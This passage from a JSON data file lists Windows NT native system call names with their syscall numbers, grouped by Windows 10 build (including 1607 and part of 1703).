"NtAlpcDeletePortSection": "124", "NtAlpcDeleteResourceReserve": "125", "NtAlpcDeleteSectionView": "126", "NtAlpcDeleteSecurityContext": "127", "NtAlpcDisconnectPort": "128", "NtAlpcImpersonateClientContainerOfPort": "129", "NtAlpcImpersonateClientOfPort": "130", "NtAlpcOpenSenderProcess": "131", "NtAlpcOpenSenderThread": "132", "NtAlpcQueryInformation": "133", "NtAlpcQueryInformationMessage": "134", "NtAlpcRevokeSecurityContext": "135", "NtAlpcSendWaitReceivePort": "136", "NtAlpcSetInformation": "137", "NtAreMappedFilesTheSame": "138", "NtAssignProcessToJobObject": "139", "NtAssociateWaitCompletionPacket": "140", "NtCancelIoFileEx": "141", "NtCancelSynchronousIoFile": "142", "NtCancelTimer2": "143", "NtCancelWaitCompletionPacket": "144", "NtCommitComplete": "145", "NtCommitEnlistment": "146", "NtCommitTransaction": "147", "NtCompactKeys": "148", "NtCompareObjects": "149", "NtCompareTokens": "150", "NtCompleteConnectPort": "151", "NtCompressKey": "152", "NtConnectPort": "153", "NtCreateDebugObject": "154", "NtCreateDirectoryObject": "155", "NtCreateDirectoryObjectEx": "156", "NtCreateEnclave": "157", "NtCreateEnlistment": "158", "NtCreateEventPair": "159", "NtCreateIRTimer": "160", "NtCreateIoCompletion": "161", "NtCreateJobObject": "162", "NtCreateJobSet": "163", "NtCreateKeyTransacted": "164", "NtCreateKeyedEvent": "165", "NtCreateLowBoxToken": "166", "NtCreateMailslotFile": "167", "NtCreateMutant": "168", "NtCreateNamedPipeFile": "169", "NtCreatePagingFile": "170", "NtCreatePartition": "171", "NtCreatePort": "172", "NtCreatePrivateNamespace": "173", "NtCreateProcess": "174", "NtCreateProfile": "175", "NtCreateProfileEx": "176", "NtCreateResourceManager": "177", "NtCreateSemaphore": "178", "NtCreateSymbolicLinkObject": "179", "NtCreateThreadEx": "180", "NtCreateTimer": "181", "NtCreateTimer2": "182", "NtCreateToken": "183", "NtCreateTokenEx": "184", "NtCreateTransaction": "185", "NtCreateTransactionManager": "186", "NtCreateUserProcess": "187", "NtCreateWaitCompletionPacket": "188", "NtCreateWaitablePort": "189", "NtCreateWnfStateName": "190", "NtCreateWorkerFactory": "191", "NtDebugActiveProcess": "192", "NtDebugContinue": "193", "NtDeleteAtom": "194", "NtDeleteBootEntry": "195", "NtDeleteDriverEntry": "196", "NtDeleteFile": "197", "NtDeleteKey": "198", "NtDeleteObjectAuditAlarm": "199", "NtDeletePrivateNamespace": "200", "NtDeleteValueKey": "201", "NtDeleteWnfStateData": "202", "NtDeleteWnfStateName": "203", "NtDisableLastKnownGood": "204", "NtDisplayString": "205", "NtDrawText": "206", "NtEnableLastKnownGood": "207", "NtEnumerateBootEntries": "208", "NtEnumerateDriverEntries": "209", "NtEnumerateSystemEnvironmentValuesEx": "210", "NtEnumerateTransactionObject": "211", "NtExtendSection": "212", "NtFilterBootOption": "213", "NtFilterToken": "214", "NtFilterTokenEx": "215", "NtFlushBuffersFileEx": "216", "NtFlushInstallUILanguage": "217", "NtFlushInstructionCache": "218", "NtFlushKey": "219", "NtFlushProcessWriteBuffers": "220", "NtFlushVirtualMemory": "221", "NtFlushWriteBuffer": "222", "NtFreeUserPhysicalPages": "223", "NtFreezeRegistry": "224", "NtFreezeTransactions": "225", "NtGetCachedSigningLevel": "226", "NtGetCompleteWnfStateSubscription": "227", "NtGetContextThread": "228", "NtGetCurrentProcessorNumber": "229", "NtGetCurrentProcessorNumberEx": "230", "NtGetDevicePowerState": "231", "NtGetMUIRegistryInfo": "232", "NtGetNextProcess": "233", "NtGetNextThread": "234", "NtGetNlsSectionPtr": "235", "NtGetNotificationResourceManager": "236", "NtGetWriteWatch": "237", "NtImpersonateAnonymousToken": "238", "NtImpersonateThread": "239", "NtInitializeEnclave": "240", "NtInitializeNlsFiles": "241", "NtInitializeRegistry": "242", "NtInitiatePowerAction": "243", "NtIsSystemResumeAutomatic": "244", "NtIsUILanguageComitted": "245", "NtListenPort": "246", "NtLoadDriver": "247", "NtLoadEnclaveData": "248", "NtLoadKey": "249", "NtLoadKey2": "250", "NtLoadKeyEx": "251", "NtLockFile": "252", "NtLockProductActivationKeys": "253", "NtLockRegistryKey": "254", "NtLockVirtualMemory": "255", "NtMakePermanentObject": "256", "NtMakeTemporaryObject": "257", "NtManagePartition": "258", "NtMapCMFModule": "259", "NtMapUserPhysicalPages": "260", "NtModifyBootEntry": "261", "NtModifyDriverEntry": "262", "NtNotifyChangeDirectoryFile": "263", "NtNotifyChangeKey": "264", "NtNotifyChangeMultipleKeys": "265", "NtNotifyChangeSession": "266", "NtOpenEnlistment": "267", "NtOpenEventPair": "268", "NtOpenIoCompletion": "269", "NtOpenJobObject": "270", "NtOpenKeyEx": "271", "NtOpenKeyTransacted": "272", "NtOpenKeyTransactedEx": "273", "NtOpenKeyedEvent": "274", "NtOpenMutant": "275", "NtOpenObjectAuditAlarm": "276", "NtOpenPartition": "277", "NtOpenPrivateNamespace": "278", "NtOpenProcessToken": "279", "NtOpenResourceManager": "280", "NtOpenSemaphore": "281", "NtOpenSession": "282", "NtOpenSymbolicLinkObject": "283", "NtOpenThread": "284", "NtOpenTimer": "285", "NtOpenTransaction": "286", "NtOpenTransactionManager": "287", "NtPlugPlayControl": "288", "NtPrePrepareComplete": "289", "NtPrePrepareEnlistment": "290", "NtPrepareComplete": "291", "NtPrepareEnlistment": "292", "NtPrivilegeCheck": "293", "NtPrivilegeObjectAuditAlarm": "294", "NtPrivilegedServiceAuditAlarm": "295", "NtPropagationComplete": "296", "NtPropagationFailed": "297", "NtPulseEvent": "298", "NtQueryBootEntryOrder": "299", "NtQueryBootOptions": "300", "NtQueryDebugFilterState": "301", "NtQueryDirectoryObject": "302", "NtQueryDriverEntryOrder": "303", "NtQueryEaFile": "304", "NtQueryFullAttributesFile": "305", "NtQueryInformationAtom": "306", "NtQueryInformationEnlistment": "307", "NtQueryInformationJobObject": "308", "NtQueryInformationPort": "309", "NtQueryInformationResourceManager": "310", "NtQueryInformationTransaction": "311", "NtQueryInformationTransactionManager": "312", "NtQueryInformationWorkerFactory": "313", "NtQueryInstallUILanguage": "314", "NtQueryIntervalProfile": "315", "NtQueryIoCompletion": "316", "NtQueryLicenseValue": "317", "NtQueryMultipleValueKey": "318", "NtQueryMutant": "319", "NtQueryOpenSubKeys": "320", "NtQueryOpenSubKeysEx": "321", "NtQueryPortInformationProcess": "322", "NtQueryQuotaInformationFile": "323", "NtQuerySecurityAttributesToken": "324", "NtQuerySecurityObject": "325", "NtQuerySemaphore": "326", "NtQuerySymbolicLinkObject": "327", "NtQuerySystemEnvironmentValue": "328", "NtQuerySystemEnvironmentValueEx": "329", "NtQuerySystemInformationEx": "330", "NtQueryTimerResolution": "331", "NtQueryWnfStateData": "332", "NtQueryWnfStateNameInformation": "333", "NtQueueApcThreadEx": "334", "NtRaiseException": "335", "NtRaiseHardError": "336", "NtReadOnlyEnlistment": "337", "NtRecoverEnlistment": "338", "NtRecoverResourceManager": "339", "NtRecoverTransactionManager": "340", "NtRegisterProtocolAddressInformation": "341", "NtRegisterThreadTerminatePort": "342", "NtReleaseKeyedEvent": "343", "NtReleaseWorkerFactoryWorker": "344", "NtRemoveIoCompletionEx": "345", "NtRemoveProcessDebug": "346", "NtRenameKey": "347", "NtRenameTransactionManager": "348", "NtReplaceKey": "349", "NtReplacePartitionUnit": "350", "NtReplyWaitReplyPort": "351", "NtRequestPort": "352", "NtResetEvent": "353", "NtResetWriteWatch": "354", "NtRestoreKey": "355", "NtResumeProcess": "356", "NtRevertContainerImpersonation": "357", "NtRollbackComplete": "358", "NtRollbackEnlistment": "359", "NtRollbackTransaction": "360", "NtRollforwardTransactionManager": "361", "NtSaveKey": "362", "NtSaveKeyEx": "363", "NtSaveMergedKeys": "364", "NtSecureConnectPort": "365", "NtSerializeBoot": "366", "NtSetBootEntryOrder": "367", "NtSetBootOptions": "368", "NtSetCachedSigningLevel": "369", "NtSetContextThread": "370", "NtSetDebugFilterState": "371", "NtSetDefaultHardErrorPort": "372", "NtSetDefaultLocale": "373", "NtSetDefaultUILanguage": "374", "NtSetDriverEntryOrder": "375", "NtSetEaFile": "376", "NtSetHighEventPair": "377", "NtSetHighWaitLowEventPair": "378", "NtSetIRTimer": "379", "NtSetInformationDebugObject": "380", "NtSetInformationEnlistment": "381", "NtSetInformationJobObject": "382", "NtSetInformationKey": "383", "NtSetInformationResourceManager": "384", "NtSetInformationSymbolicLink": "385", "NtSetInformationToken": "386", "NtSetInformationTransaction": "387", "NtSetInformationTransactionManager": "388", "NtSetInformationVirtualMemory": "389", "NtSetInformationWorkerFactory": "390", "NtSetIntervalProfile": "391", "NtSetIoCompletion": "392", "NtSetIoCompletionEx": "393", "NtSetLdtEntries": "394", "NtSetLowEventPair": "395", "NtSetLowWaitHighEventPair": "396", "NtSetQuotaInformationFile": "397", "NtSetSecurityObject": "398", "NtSetSystemEnvironmentValue": "399", "NtSetSystemEnvironmentValueEx": "400", "NtSetSystemInformation": "401", "NtSetSystemPowerState": "402", "NtSetSystemTime": "403", "NtSetThreadExecutionState": "404", "NtSetTimer2": "405", "NtSetTimerEx": "406", "NtSetTimerResolution": "407", "NtSetUuidSeed": "408", "NtSetVolumeInformationFile": "409", "NtSetWnfProcessNotificationEvent": "410", "NtShutdownSystem": "411", "NtShutdownWorkerFactory": "412", "NtSignalAndWaitForSingleObject": "413", "NtSinglePhaseReject": "414", "NtStartProfile": "415", "NtStopProfile": "416", "NtSubscribeWnfStateChange": "417", "NtSuspendProcess": "418", "NtSuspendThread": "419", "NtSystemDebugControl": "420", "NtTerminateJobObject": "421", "NtTestAlert": "422", "NtThawRegistry": "423", "NtThawTransactions": "424", "NtTraceControl": "425", "NtTranslateFilePath": "426", "NtUmsThreadYield": "427", "NtUnloadDriver": "428", "NtUnloadKey": "429", "NtUnloadKey2": "430", "NtUnloadKeyEx": "431", "NtUnlockFile": "432", "NtUnlockVirtualMemory": "433", "NtUnmapViewOfSectionEx": "434", "NtUnsubscribeWnfStateChange": "435", "NtUpdateWnfStateData": "436", "NtVdmControl": "437", "NtWaitForAlertByThreadId": "438", "NtWaitForDebugEvent": "439", "NtWaitForKeyedEvent": "440", "NtWaitForWorkViaWorkerFactory": "441", "NtWaitHighEventPair": "442", "NtWaitLowEventPair": "443"}, "1607": {"NtAccessCheck": "0", "NtWorkerFactoryWorkerReady": "1", "NtAcceptConnectPort": "2", "NtMapUserPhysicalPagesScatter": "3", "NtWaitForSingleObject": "4", "NtCallbackReturn": "5", "NtReadFile": "6", "NtDeviceIoControlFile": "7", "NtWriteFile": "8", "NtRemoveIoCompletion": "9", "NtReleaseSemaphore": "10", "NtReplyWaitReceivePort": "11", "NtReplyPort": "12", "NtSetInformationThread": "13", "NtSetEvent": "14", "NtClose": "15", "NtQueryObject": "16", "NtQueryInformationFile": "17", "NtOpenKey": "18", "NtEnumerateValueKey": "19", "NtFindAtom": "20", "NtQueryDefaultLocale": "21", "NtQueryKey": "22", "NtQueryValueKey": "23", "NtAllocateVirtualMemory": "24", "NtQueryInformationProcess": "25", "NtWaitForMultipleObjects32": "26", "NtWriteFileGather": "27", "NtSetInformationProcess": "28", "NtCreateKey": "29", "NtFreeVirtualMemory": "30", "NtImpersonateClientOfPort": "31", "NtReleaseMutant": "32", "NtQueryInformationToken": "33", "NtRequestWaitReplyPort": "34", "NtQueryVirtualMemory": "35", "NtOpenThreadToken": "36", "NtQueryInformationThread": "37", "NtOpenProcess": "38", "NtSetInformationFile": "39", "NtMapViewOfSection": "40", "NtAccessCheckAndAuditAlarm": "41", "NtUnmapViewOfSection": "42", "NtReplyWaitReceivePortEx": "43", "NtTerminateProcess": "44", "NtSetEventBoostPriority": "45", "NtReadFileScatter": "46", "NtOpenThreadTokenEx": "47", "NtOpenProcessTokenEx": "48", "NtQueryPerformanceCounter": "49", "NtEnumerateKey": "50", "NtOpenFile": "51", "NtDelayExecution": "52", "NtQueryDirectoryFile": "53", "NtQuerySystemInformation": "54", "NtOpenSection": "55", "NtQueryTimer": "56", "NtFsControlFile": "57", "NtWriteVirtualMemory": "58", "NtCloseObjectAuditAlarm": "59", "NtDuplicateObject": "60", "NtQueryAttributesFile": "61", "NtClearEvent": "62", "NtReadVirtualMemory": "63", "NtOpenEvent": "64", "NtAdjustPrivilegesToken": "65", "NtDuplicateToken": "66", "NtContinue": "67", "NtQueryDefaultUILanguage": "68", "NtQueueApcThread": "69", "NtYieldExecution": "70", "NtAddAtom": "71", "NtCreateEvent": "72", "NtQueryVolumeInformationFile": "73", "NtCreateSection": "74", "NtFlushBuffersFile": "75", "NtApphelpCacheControl": "76", "NtCreateProcessEx": "77", "NtCreateThread": "78", "NtIsProcessInJob": "79", "NtProtectVirtualMemory": "80", "NtQuerySection": "81", "NtResumeThread": "82", "NtTerminateThread": "83", "NtReadRequestData": "84", "NtCreateFile": "85", "NtQueryEvent": "86", "NtWriteRequestData": "87", "NtOpenDirectoryObject": "88", "NtAccessCheckByTypeAndAuditAlarm": "89", "NtQuerySystemTime": "90", "NtWaitForMultipleObjects": "91", "NtSetInformationObject": "92", "NtCancelIoFile": "93", "NtTraceEvent": "94", "NtPowerInformation": "95", "NtSetValueKey": "96", "NtCancelTimer": "97", "NtSetTimer": "98", "NtAccessCheckByType": "99", "NtAccessCheckByTypeResultList": "100", "NtAccessCheckByTypeResultListAndAuditAlarm": "101", "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": "102", "NtAddAtomEx": "103", "NtAddBootEntry": "104", "NtAddDriverEntry": "105", "NtAdjustGroupsToken": "106", "NtAdjustTokenClaimsAndDeviceGroups": "107", "NtAlertResumeThread": "108", "NtAlertThread": "109", "NtAlertThreadByThreadId": "110", "NtAllocateLocallyUniqueId": "111", "NtAllocateReserveObject": "112", "NtAllocateUserPhysicalPages": "113", "NtAllocateUuids": "114", "NtAlpcAcceptConnectPort": "115", "NtAlpcCancelMessage": "116", "NtAlpcConnectPort": "117", "NtAlpcConnectPortEx": "118", "NtAlpcCreatePort": "119", "NtAlpcCreatePortSection": "120", "NtAlpcCreateResourceReserve": "121", "NtAlpcCreateSectionView": "122", "NtAlpcCreateSecurityContext": "123", "NtAlpcDeletePortSection": "124", "NtAlpcDeleteResourceReserve": "125", "NtAlpcDeleteSectionView": "126", "NtAlpcDeleteSecurityContext": "127", "NtAlpcDisconnectPort": "128", "NtAlpcImpersonateClientContainerOfPort": "129", "NtAlpcImpersonateClientOfPort": "130", "NtAlpcOpenSenderProcess": "131", "NtAlpcOpenSenderThread": "132", "NtAlpcQueryInformation": "133", "NtAlpcQueryInformationMessage": "134", "NtAlpcRevokeSecurityContext": "135", "NtAlpcSendWaitReceivePort": "136", "NtAlpcSetInformation": "137", "NtAreMappedFilesTheSame": "138", "NtAssignProcessToJobObject": "139", "NtAssociateWaitCompletionPacket": "140", "NtCancelIoFileEx": "141", "NtCancelSynchronousIoFile": "142", "NtCancelTimer2": "143", "NtCancelWaitCompletionPacket": "144", "NtCommitComplete": "145", "NtCommitEnlistment": "146", "NtCommitRegistryTransaction": "147", "NtCommitTransaction": "148", "NtCompactKeys": "149", "NtCompareObjects": "150", "NtCompareTokens": "151", "NtCompleteConnectPort": "152", "NtCompressKey": "153", "NtConnectPort": "154", "NtCreateDebugObject": "155", "NtCreateDirectoryObject": "156", "NtCreateDirectoryObjectEx": "157", "NtCreateEnclave": "158", "NtCreateEnlistment": "159", "NtCreateEventPair": "160", "NtCreateIRTimer": "161", "NtCreateIoCompletion": "162", "NtCreateJobObject": "163", "NtCreateJobSet": "164", "NtCreateKeyTransacted": "165", "NtCreateKeyedEvent": "166", "NtCreateLowBoxToken": "167", "NtCreateMailslotFile": "168", "NtCreateMutant": "169", "NtCreateNamedPipeFile": "170", "NtCreatePagingFile": "171", "NtCreatePartition": "172", "NtCreatePort": "173", "NtCreatePrivateNamespace": "174", "NtCreateProcess": "175", "NtCreateProfile": "176", "NtCreateProfileEx": "177", "NtCreateRegistryTransaction": "178", "NtCreateResourceManager": "179", "NtCreateSemaphore": "180", "NtCreateSymbolicLinkObject": "181", "NtCreateThreadEx": "182", "NtCreateTimer": "183", "NtCreateTimer2": "184", "NtCreateToken": "185", "NtCreateTokenEx": "186", "NtCreateTransaction": "187", "NtCreateTransactionManager": "188", "NtCreateUserProcess": "189", "NtCreateWaitCompletionPacket": "190", "NtCreateWaitablePort": "191", "NtCreateWnfStateName": "192", "NtCreateWorkerFactory": "193", "NtDebugActiveProcess": "194", "NtDebugContinue": "195", "NtDeleteAtom": "196", "NtDeleteBootEntry": "197", "NtDeleteDriverEntry": "198", "NtDeleteFile": "199", "NtDeleteKey": "200", "NtDeleteObjectAuditAlarm": "201", "NtDeletePrivateNamespace": "202", "NtDeleteValueKey": "203", "NtDeleteWnfStateData": "204", "NtDeleteWnfStateName": "205", "NtDisableLastKnownGood": "206", "NtDisplayString": "207", "NtDrawText": "208", "NtEnableLastKnownGood": "209", "NtEnumerateBootEntries": "210", "NtEnumerateDriverEntries": "211", "NtEnumerateSystemEnvironmentValuesEx": "212", "NtEnumerateTransactionObject": "213", "NtExtendSection": "214", "NtFilterBootOption": "215", "NtFilterToken": "216", "NtFilterTokenEx": "217", "NtFlushBuffersFileEx": "218", "NtFlushInstallUILanguage": "219", "NtFlushInstructionCache": "220", "NtFlushKey": "221", "NtFlushProcessWriteBuffers": "222", "NtFlushVirtualMemory": "223", "NtFlushWriteBuffer": "224", "NtFreeUserPhysicalPages": "225", "NtFreezeRegistry": "226", "NtFreezeTransactions": "227", "NtGetCachedSigningLevel": "228", "NtGetCompleteWnfStateSubscription": "229", "NtGetContextThread": "230", "NtGetCurrentProcessorNumber": "231", "NtGetCurrentProcessorNumberEx": "232", "NtGetDevicePowerState": "233", "NtGetMUIRegistryInfo": "234", "NtGetNextProcess": "235", "NtGetNextThread": "236", "NtGetNlsSectionPtr": "237", "NtGetNotificationResourceManager": "238", "NtGetWriteWatch": "239", "NtImpersonateAnonymousToken": "240", "NtImpersonateThread": "241", "NtInitializeEnclave": "242", "NtInitializeNlsFiles": "243", "NtInitializeRegistry": "244", "NtInitiatePowerAction": "245", "NtIsSystemResumeAutomatic": "246", "NtIsUILanguageComitted": "247", "NtListenPort": "248", "NtLoadDriver": "249", "NtLoadEnclaveData": "250", "NtLoadKey": "251", "NtLoadKey2": "252", "NtLoadKeyEx": "253", "NtLockFile": "254", "NtLockProductActivationKeys": "255", "NtLockRegistryKey": "256", "NtLockVirtualMemory": "257", "NtMakePermanentObject": "258", "NtMakeTemporaryObject": "259", "NtManagePartition": "260", "NtMapCMFModule": "261", "NtMapUserPhysicalPages": "262", "NtModifyBootEntry": "263", "NtModifyDriverEntry": "264", "NtNotifyChangeDirectoryFile": "265", "NtNotifyChangeKey": "266", "NtNotifyChangeMultipleKeys": "267", "NtNotifyChangeSession": "268", "NtOpenEnlistment": "269", "NtOpenEventPair": "270", "NtOpenIoCompletion": "271", "NtOpenJobObject": "272", "NtOpenKeyEx": "273", "NtOpenKeyTransacted": "274", "NtOpenKeyTransactedEx": "275", "NtOpenKeyedEvent": "276", "NtOpenMutant": "277", "NtOpenObjectAuditAlarm": "278", "NtOpenPartition": "279", "NtOpenPrivateNamespace": "280", "NtOpenProcessToken": "281", "NtOpenRegistryTransaction": "282", "NtOpenResourceManager": "283", "NtOpenSemaphore": "284", "NtOpenSession": "285", "NtOpenSymbolicLinkObject": "286", "NtOpenThread": "287", "NtOpenTimer": "288", "NtOpenTransaction": "289", "NtOpenTransactionManager": "290", "NtPlugPlayControl": "291", "NtPrePrepareComplete": "292", "NtPrePrepareEnlistment": "293", "NtPrepareComplete": "294", "NtPrepareEnlistment": "295", "NtPrivilegeCheck": "296", "NtPrivilegeObjectAuditAlarm": "297", "NtPrivilegedServiceAuditAlarm": "298", "NtPropagationComplete": "299", "NtPropagationFailed": "300", "NtPulseEvent": "301", "NtQueryBootEntryOrder": "302", "NtQueryBootOptions": "303", "NtQueryDebugFilterState": "304", "NtQueryDirectoryObject": "305", "NtQueryDriverEntryOrder": "306", "NtQueryEaFile": "307", "NtQueryFullAttributesFile": "308", "NtQueryInformationAtom": "309", "NtQueryInformationEnlistment": "310", "NtQueryInformationJobObject": "311", "NtQueryInformationPort": "312", "NtQueryInformationResourceManager": "313", "NtQueryInformationTransaction": "314", "NtQueryInformationTransactionManager": "315", "NtQueryInformationWorkerFactory": "316", "NtQueryInstallUILanguage": "317", "NtQueryIntervalProfile": "318", "NtQueryIoCompletion": "319", "NtQueryLicenseValue": "320", "NtQueryMultipleValueKey": "321", "NtQueryMutant": "322", "NtQueryOpenSubKeys": "323", "NtQueryOpenSubKeysEx": "324", "NtQueryPortInformationProcess": "325", "NtQueryQuotaInformationFile": "326", "NtQuerySecurityAttributesToken": "327", "NtQuerySecurityObject": "328", "NtQuerySecurityPolicy": "329", "NtQuerySemaphore": "330", "NtQuerySymbolicLinkObject": "331", "NtQuerySystemEnvironmentValue": "332", "NtQuerySystemEnvironmentValueEx": "333", "NtQuerySystemInformationEx": "334", "NtQueryTimerResolution": "335", "NtQueryWnfStateData": "336", "NtQueryWnfStateNameInformation": "337", "NtQueueApcThreadEx": "338", "NtRaiseException": "339", "NtRaiseHardError": "340", "NtReadOnlyEnlistment": "341", "NtRecoverEnlistment": "342", "NtRecoverResourceManager": "343", "NtRecoverTransactionManager": "344", "NtRegisterProtocolAddressInformation": "345", "NtRegisterThreadTerminatePort": "346", "NtReleaseKeyedEvent": "347", "NtReleaseWorkerFactoryWorker": "348", "NtRemoveIoCompletionEx": "349", "NtRemoveProcessDebug": "350", "NtRenameKey": "351", "NtRenameTransactionManager": "352", "NtReplaceKey": "353", "NtReplacePartitionUnit": "354", "NtReplyWaitReplyPort": "355", "NtRequestPort": "356", "NtResetEvent": "357", "NtResetWriteWatch": "358", "NtRestoreKey": "359", "NtResumeProcess": "360", "NtRevertContainerImpersonation": "361", "NtRollbackComplete": "362", "NtRollbackEnlistment": "363", "NtRollbackRegistryTransaction": "364", "NtRollbackTransaction": "365", "NtRollforwardTransactionManager": "366", "NtSaveKey": "367", "NtSaveKeyEx": "368", "NtSaveMergedKeys": "369", "NtSecureConnectPort": "370", "NtSerializeBoot": "371", "NtSetBootEntryOrder": "372", "NtSetBootOptions": "373", "NtSetCachedSigningLevel": "374", "NtSetCachedSigningLevel2": "375", "NtSetContextThread": "376", "NtSetDebugFilterState": "377", "NtSetDefaultHardErrorPort": "378", "NtSetDefaultLocale": "379", "NtSetDefaultUILanguage": "380", "NtSetDriverEntryOrder": "381", "NtSetEaFile": "382", "NtSetHighEventPair": "383", "NtSetHighWaitLowEventPair": "384", "NtSetIRTimer": "385", "NtSetInformationDebugObject": "386", "NtSetInformationEnlistment": "387", "NtSetInformationJobObject": "388", "NtSetInformationKey": "389", "NtSetInformationResourceManager": "390", "NtSetInformationSymbolicLink": "391", "NtSetInformationToken": "392", "NtSetInformationTransaction": "393", "NtSetInformationTransactionManager": "394", "NtSetInformationVirtualMemory": "395", "NtSetInformationWorkerFactory": "396", "NtSetIntervalProfile": "397", "NtSetIoCompletion": "398", "NtSetIoCompletionEx": "399", "NtSetLdtEntries": "400", "NtSetLowEventPair": "401", "NtSetLowWaitHighEventPair": "402", "NtSetQuotaInformationFile": "403", "NtSetSecurityObject": "404", "NtSetSystemEnvironmentValue": "405", "NtSetSystemEnvironmentValueEx": "406", "NtSetSystemInformation": "407", "NtSetSystemPowerState": "408", "NtSetSystemTime": "409", "NtSetThreadExecutionState": "410", "NtSetTimer2": "411", "NtSetTimerEx": "412", "NtSetTimerResolution": "413", "NtSetUuidSeed": "414", "NtSetVolumeInformationFile": "415", "NtSetWnfProcessNotificationEvent": "416", "NtShutdownSystem": "417", "NtShutdownWorkerFactory": "418", "NtSignalAndWaitForSingleObject": "419", "NtSinglePhaseReject": "420", "NtStartProfile": "421", "NtStopProfile": "422", "NtSubscribeWnfStateChange": "423", "NtSuspendProcess": "424", "NtSuspendThread": "425", "NtSystemDebugControl": "426", "NtTerminateJobObject": "427", "NtTestAlert": "428", "NtThawRegistry": "429", "NtThawTransactions": "430", "NtTraceControl": "431", "NtTranslateFilePath": "432", "NtUmsThreadYield": "433", "NtUnloadDriver": "434", "NtUnloadKey": "435", "NtUnloadKey2": "436", "NtUnloadKeyEx": "437", "NtUnlockFile": "438", "NtUnlockVirtualMemory": "439", "NtUnmapViewOfSectionEx": "440", "NtUnsubscribeWnfStateChange": "441", "NtUpdateWnfStateData": "442", "NtVdmControl": "443", "NtWaitForAlertByThreadId": "444", "NtWaitForDebugEvent": "445", "NtWaitForKeyedEvent": "446", "NtWaitForWorkViaWorkerFactory": "447", "NtWaitHighEventPair": "448", "NtWaitLowEventPair": "449"}, "1703": {"NtAccessCheck": "0", "NtWorkerFactoryWorkerReady": "1", "NtAcceptConnectPort": "2", "NtMapUserPhysicalPagesScatter": "3", "NtWaitForSingleObject": "4", "NtCallbackReturn": "5", "NtReadFile": "6", "NtDeviceIoControlFile": "7", "NtWriteFile": "8", "NtRemoveIoCompletion": "9", "NtReleaseSemaphore": "10", "NtReplyWaitReceivePort": "11", "NtReplyPort": "12", "NtSetInformationThread": "13", "NtSetEvent": "14", "NtClose": "15", "NtQueryObject": "16", "NtQueryInformationFile": "17", "NtOpenKey": "18", "NtEnumerateValueKey": "19", "NtFindAtom": "20", "NtQueryDefaultLocale": "21", "NtQueryKey": "22", "NtQueryValueKey": "23", "NtAllocateVirtualMemory": "24", "NtQueryInformationProcess": "25", "NtWaitForMultipleObjects32": "26", "NtWriteFileGather": "27", "NtSetInformationProcess": "28", "NtCreateKey": "29", "NtFreeVirtualMemory": "30", "NtImpersonateClientOfPort": "31", "NtReleaseMutant": "32", "NtQueryInformationToken": "33", "NtRequestWaitReplyPort": "34", "NtQueryVirtualMemory": "35", "NtOpenThreadToken": "36", "NtQueryInformationThread": "37", "NtOpenProcess": "38", "NtSetInformationFile": "39", "NtMapViewOfSection": "40", "NtAccessCheckAndAuditAlarm": "41", "NtUnmapViewOfSection": "42", "NtReplyWaitReceivePortEx": "43", "NtTerminateProcess": "44", "NtSetEventBoostPriority": "45", "NtReadFileScatter": "46", "NtOpenThreadTokenEx": "47", "NtOpenProcessTokenEx": "48", "NtQueryPerformanceCounter": "49", "NtEnumerateKey": "50", "NtOpenFile": "51", "NtDelayExecution": "52", "NtQueryDirectoryFile": "53", "NtQuerySystemInformation": "54", "NtOpenSection": "55", "NtQueryTimer": "56", "NtFsControlFile": "57", "NtWriteVirtualMemory": "58", "NtCloseObjectAuditAlarm": "59", "NtDuplicateObject": "60", "NtQueryAttributesFile": "61", "NtClearEvent": "62", "NtReadVirtualMemory": "63", "NtOpenEvent": "64", "NtAdjustPrivilegesToken": "65", "NtDuplicateToken": "66", "NtContinue": "67", "NtQueryDefaultUILanguage": "68", "NtQueueApcThread": "69", "NtYieldExecution": "70", "NtAddAtom": "71", "NtCreateEvent": "72", "NtQueryVolumeInformationFile": "73", "NtCreateSection": "74", "NtFlushBuffersFile": "75", "NtApphelpCacheControl": "76", "NtCreateProcessEx": "77", "NtCreateThread": "78", "NtIsProcessInJob": "79", "NtProtectVirtualMemory": "80", "NtQuerySection": "81", "NtResumeThread": "82", "NtTerminateThread": "83", "NtReadRequestData": "84", "NtCreateFile": "85", "NtQueryEvent": "86", "NtWriteRequestData": "87", "NtOpenDirectoryObject": "88", "NtAccessCheckByTypeAndAuditAlarm": "89", "NtQuerySystemTime": "90", "NtWaitForMultipleObjects": "91", "NtSetInformationObject": "92", "NtCancelIoFile": "93", "NtTraceEvent": "94", "NtPowerInformation": "95", "NtSetValueKey": "96", "NtCancelTimer": "97", "NtSetTimer": "98", "NtAccessCheckByType": "99", "NtAccessCheckByTypeResultList": "100", "NtAccessCheckByTypeResultListAndAuditAlarm": "101", "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": "102", "NtAcquireProcessActivityReference": "103", "NtAddAtomEx": "104", "NtAddBootEntry": "105", "NtAddDriverEntry": "106", "NtAdjustGroupsToken": "107", "NtAdjustTokenClaimsAndDeviceGroups": "108", "NtAlertResumeThread": "109", "NtAlertThread": "110", "NtAlertThreadByThreadId": "111", "NtAllocateLocallyUniqueId": "112", "NtAllocateReserveObject": "113", "NtAllocateUserPhysicalPages": "114", "NtAllocateUuids": "115", "NtAlpcAcceptConnectPort": "116", "NtAlpcCancelMessage": "117", "NtAlpcConnectPort": "118", "NtAlpcConnectPortEx": "119", "NtAlpcCreatePort": "120", "NtAlpcCreatePortSection": "121", "NtAlpcCreateResourceReserve": "122", "NtAlpcCreateSectionView": "123", "NtAlpcCreateSecurityContext": "124", "NtAlpcDeletePortSection": "125", "NtAlpcDeleteResourceReserve": "126", "NtAlpcDeleteSectionView": "127", "NtAlpcDeleteSecurityContext": "128", "NtAlpcDisconnectPort": "129", "NtAlpcImpersonateClientContainerOfPort": "130", "NtAlpcImpersonateClientOfPort": "131", "NtAlpcOpenSenderProcess": "132", "NtAlpcOpenSenderThread": "133", "NtAlpcQueryInformation": "134", "NtAlpcQueryInformationMessage": "135", "NtAlpcRevokeSecurityContext": "136", "NtAlpcSendWaitReceivePort": "137", "NtAlpcSetInformation": "138", "NtAreMappedFilesTheSame": "139", "NtAssignProcessToJobObject": "140", "NtAssociateWaitCompletionPacket": "141", "NtCancelIoFileEx": "142", "NtCancelSynchronousIoFile": "143", "NtCancelTimer2": "144", "NtCancelWaitCompletionPacket": "145", "NtCommitComplete": "146", "NtCommitEnlistment": "147", "NtCommitRegistryTransaction": "148", "NtCommitTransaction": "149", "NtCompactKeys": "150", "NtCompareObjects": "151", "NtCompareSigningLevels": "152", "NtCompareTokens": "153", "NtCompleteConnectPort": "154", "NtCompressKey": "155", 